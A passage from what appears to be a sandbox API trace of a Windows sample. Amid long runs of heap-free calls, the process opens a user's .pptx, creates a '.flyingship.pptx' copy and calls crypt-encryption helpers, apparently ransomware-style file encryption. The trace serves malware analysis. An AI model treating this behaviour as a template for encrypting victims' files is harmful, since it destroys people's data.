hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b4b0 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.443] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.443] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.443] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.443] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.443] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.443] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a10a0 | out: hHeap=0x650000) returned 1 [0075.443] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.443] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.443] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.443] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0075.443] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.443] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8a38 | out: hHeap=0x650000) returned 1 [0075.443] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.443] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.443] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.443] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\vmwpxwqdquqhtrkz9rx.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.443] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.443] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.444] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a10a0 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.444] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0075.444] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69eaf8 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0075.444] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.445] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d730 | out: hHeap=0x650000) returned 1 [0075.445] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.445] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.445] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.445] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd")) returned 0x10 [0075.445] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6969c0 | out: hHeap=0x650000) returned 1 [0075.445] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.445] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d7a8 | out: hHeap=0x650000) returned 1 [0075.445] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.445] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.445] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.flyingship.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\vmwpxwqdquqhtrkz9rx.flyingship.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.446] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.446] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.446] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.446] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.446] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.446] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.446] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a10a0 | out: hHeap=0x650000) returned 1 [0075.446] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.446] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.446] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.446] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b78 | out: hHeap=0x650000) returned 1 [0075.446] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.446] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.446] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.447] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.447] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.447] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.447] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0075.447] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x3ec3, lpOverlapped=0x0) returned 1 [0075.449] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0075.449] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.449] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.460] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.461] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x32b0020 | out: hHeap=0x650000) returned 1 [0075.461] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.461] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.461] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.461] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.461] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a10a0 | out: hHeap=0x650000) returned 1 [0075.461] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.461] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.461] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.461] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a10a0 | out: hHeap=0x650000) returned 1 [0075.461] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.461] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.461] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.461] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.461] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.461] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.461] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.461] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.462] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.462] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0075.462] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.462] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.462] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.462] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.462] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.462] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.462] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.462] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.463] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0075.463] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.463] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.463] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db30 | out: hHeap=0x650000) returned 1 [0075.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.464] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db30 | out: hHeap=0x650000) returned 1 [0075.464] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.464] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.464] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: 